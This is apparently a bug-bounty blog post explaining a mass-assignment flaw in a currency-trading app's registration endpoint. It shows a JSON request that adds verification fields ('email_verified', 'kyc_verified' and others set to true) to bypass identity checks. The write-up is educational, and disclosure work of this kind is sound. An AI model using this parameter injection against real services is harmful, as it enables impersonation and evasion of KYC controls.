السلام عليكم
Assalamu. , long time no see… In my latest post, I shared how I chained IDOR with Account Takeover, If you haven’t read it yet, go ahead and take a look!
I would love to connect on LinkedIn with you, if you haven’t, send me a request!
I will keep it short with loads of info…
whoami - I am a Security Consultant, who in always in the search of imperfection of the applicationss.
Mass-Assignments: In simple words in this vulnerability we can add additional parameters in the POST request to change the value of data that cannot be changed by the user, ex- while registration we added “role”:“administrator”
So…. let’ begin
Let’s say there is a website freepalestine.free, as I cannot disclose the website name. An apps verifies user’s identity then only allow users to buy and sell currency.
Steps to resurrect the bug:
We registered a user, it’s JSON data looked like.
"name":"test",
"phone_no":"1234",
"passwd":"4321",
"confirm_passwd":"4321"I saw a request triggered just after registration /userinfo, it fetches user’s data with it’s cookie and it’s response contains info about the user.
"name":"test",
"phone_no":"1234",
blahh..,
blahh....,
"email_verified":"false",
"phone_verified":"false",
"kyc_verified":"false"then I thought of a something, then thought why not…
I again registered a user, but this time I added a two or more additional parameters with it’s value set to true…
"name":"hacker",
"phone_no":"1234",
"passwd":"43211234",
"confirm_passwd":"43211234",
"email_verified":"true",
"phone_verified":"true",
"kyc_verified":"true"and BAAAAMM !!!!! got 200 OK
Again just after registration /userinfo triggered, it’s response was something like:-
"name":"hacker",
"phone_no":"1234",
blah..,
blahh...,
"email_verified":"true",
"phone_verified":"true",
"kyc_verified":"true"I was like
IMPACTT:
-As an attacker I can register with anyone’s email and phone no and get it verified by hacking..
-Then, can act as someone with a verified profile.
-I was able to access all the functionality that were available to user only after all the verification process.
It could have been a $$$ bounty but, unfortunately it was assignment, I got appreciation.
In the end I hope that I helped you with any info until it was a small one.
Thank you.